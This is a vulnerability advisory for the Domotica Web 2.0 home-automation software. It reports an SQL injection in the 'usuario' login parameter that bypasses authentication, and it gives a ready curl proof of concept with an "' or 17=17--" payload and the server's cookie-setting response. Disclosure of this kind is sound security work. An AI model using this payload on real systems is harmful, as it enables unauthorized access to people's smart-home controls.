rauLink Software Domotica Web 2.0 SQL Injection

rauLink Software Domotica Web version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 2e87055a57f33f9b29edeaf78101e3e4

Download

rauLink Software Domotica Web 2.0 SQL Injection Authentication Bypass


Vendor: rauLink Software (raulsoria)
Product web page: N/A
Affected version: 2.0

Summary: Smart home automation software.

Desc: The application suffers from an SQL Injection vulnerability.
Input passed through 'usuario' POST parameter in registraUsuario is
not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and bypass the authentication mechanism.

Tested on: Apache/2.4.6 (Ubuntu)
           PHP/5.5.3-1ubuntu2.6
           phpPgAdmin/5.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5572
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5572.php


10.03.2020

--


$ curl http://192.168.1.75/registro/registraUsuario -X POST -d"usuario=' or 17=17--&password=zsl"
HTTP/1.1 200 OK
Date: Wed, 28 May 2008 00:06:54 GMT
Server: Apache/2.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Set-Cookie: PHPSESSID=gl8tbui3skca9d74m5pg7l6q96; path=/
Expires: Thu, 10 Dec 1983 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html

Source: packetstormsecurity.com
Related Posts